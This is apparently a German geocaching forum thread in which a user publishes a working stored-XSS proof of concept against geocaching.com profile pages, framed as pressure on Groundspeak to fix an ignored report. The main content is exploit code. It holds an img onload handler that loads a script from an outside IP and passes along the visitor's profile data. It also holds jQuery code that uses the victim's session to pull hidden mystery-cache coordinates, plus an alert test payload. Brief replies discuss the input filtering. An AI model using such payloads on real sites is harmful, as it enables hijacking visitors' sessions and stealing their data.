<img width="1" height="1" src="http://www.geocaching.com/images/tlnMasters/geocaching-logo.png" onload="$.getScript('http://46.38.250.204/gc_xss_by_wiesel.php?u='+escape($('.SignedInProfileLink').html()))" />
var msg = "<br><br>Hello Groundspeak.<br>\
<br>\
I already contacted you 3 times and reported this XSS vulnerability.<br>\
Apart from a request on your side for explainig details on this bug nothing had happened yet ... absolutely nothing.<br>\
So I decided to write a poor demo which grabs the final coordinates of a mystery cache from my profiles visitor.<br>\
There are some other funny things the vulnerabiliy can be used to - all done with the privileges of the visitor,<br>\
such as placing favorite points, delete caches and so on.<br>\
Hopefully, you'll finally close this and clean all existing profiles containing the shown bug now!<br><br>\
";
var user = "";
$.get("http://www.geocaching.com/seek/nearest.aspx?tx=40861821-1835-4e11-b666-8d41064d03fe&sortdir=desc&sort=dif&u="+escape(user), function( data ) {
var res = data.match(/geocache\/GC(\w{1,5})_/gi);
if (res != null && res.length>0) {
var code = res[0].substr(9,7);
$.get( "http://www.geocaching.com/geocache/"+code, function( data2 ) {
var res2 = data2.match(/seek\/wpt.aspx(.*)<\/a> \(Final/gi);
var cache = "<h1>"+$(data2).find("#ctl00_ContentBody_CacheName").text()+" FINAL:</h1><br>";
if (res2 != null && res2.length>0) {
$.get( "http://www.geocaching.com/"+res2[0].substr(0,res2[0].indexOf("\"")-1), function( data3 ) {
var wpt = $(data3).find("#ctl00_divContentMain").html();
display(cache+wpt);
});
} else {
display("<h3>Sorry, no Final Waypoint found, PMO?</h3>");
}
});
} else {
display("<h3>Sorry, i found no mysteries published by "+user+"</h3>");
}
});
display = function(out) {
$("#ctl00_ContentBody_ProfilePanel1_lblProfileText").append(msg+out);
$("#m1").hide();
$("#m2").hide();
}
<img width="1" height="1" src="http://www.geocaching.com/images/tlnMasters/geocaching-logo.png" onload="alert('XSS noch da :p')" />
Ach, in Listing (Cache, Trackable) geht's nicht? Das würde mich jetzt schwer wundern.HerrWiesel schrieb:in sein Profil aufzunehmen
Ich bin mir jetzt gerade unschlüssig, für wie schlau ich es halte, das nur in Listings, nicht aber auf der Profilseite zu filtern. So spontan fällt mir kein Szenario ein, die Unterscheidung sinnvoll zu begründen.HerrWiesel schrieb:Im Listing wird onload gefiltert, Trackable hab ich nicht probiert. Bugfix sollte also relativ trivial sein.